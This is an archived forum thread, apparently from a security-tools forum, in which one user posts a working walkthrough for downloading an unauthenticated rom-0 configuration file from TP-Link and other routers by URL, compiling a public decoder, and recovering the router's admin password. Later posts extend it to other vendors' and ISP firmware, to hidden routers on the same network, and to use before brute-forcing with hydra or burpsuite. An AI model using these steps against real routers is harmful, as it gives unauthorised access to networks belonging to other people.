PDA

View Full Version : How to Retrieve TP-Link Router Password Instantly and Remotely


mmusket33
2014-09-29, 17:56
To access the password first download the routers backup configuration file.

Associate to the router with wired or wireless access, open up your favorite web browser and enter:

http://192.168.1.1/rom-0

in the address block and wait

You will get a download/save menu -save the file.You now have an encrypted rom-0 router configuration file. In kali-linux the file will be in the /root/downloads folder. For purposes here we moved all files referenced to root.

Now go to the following address and download a rom-o decoder:

http://piotrbania.com/all/utils/RomDecoder.c

This program is in C++. You must first compile it.

Open a terminal window. With your program in root type:

gcc -o Decoder RomDecoder.c

gcc will write an executeable file called Decoder from the RomDecoder.c file you just downloaded

Now to get your password: point the Decoder program at the router configuration file.

./Decoder rom-0

Wahlah - You may see your password below

There is nothing original here. MTeams just carried the work outlined in nirsoft.net down the next logical step.Further reading and sources

http://www.nirsoft.net/utils/router_password_recovery.html

http://piotrbania.com/all/articles/tplink_patch/

MTeams
mmusket33
2014-10-01, 03:31
We have seen cases where D-Link Routers providing the wifi accesss are bridged thru LAN to a TP-Link router in the back ground. When 192.168.1.1/rom-0 is entered the TP-Link router immediately appeared and gave up its rom-0 configuration file, then stayed active on the screen allowing for keyboard input.
Lesson here test the router even if it is not TP-Link, you never know what is hiding behind the secret door.

MusketTeams
mmusket33
2015-01-10, 00:14
MTeams has found this backdoor embedded in other vendor firmware so this is NOT specific to TP-Link. The test is simple just run the ip address of the router and append it with /rom-0. Note 0=zero. For example the router is on 192.168.2.1 so just type 192.168.2.1/rom-0. The file will immediately appear for download.

Furthermore look for a non broadcasting router behind and linked to the router broadcasting. If you see the router is broadcasting on 192.168.2.1 and the default gate way is 192.168.1.1 it is a good bet there is another router existingt. In this case try 192.168.1.1/rom-0 and see what you get.

MTeams
mmusket33
2016-02-04, 10:18
MTeams continues to find this flaw embedded in firmware written by ISPs who write their own router firmware.

So before you try using hydra or burpsuite save yourself some time and test the router for this flaw.

MTeams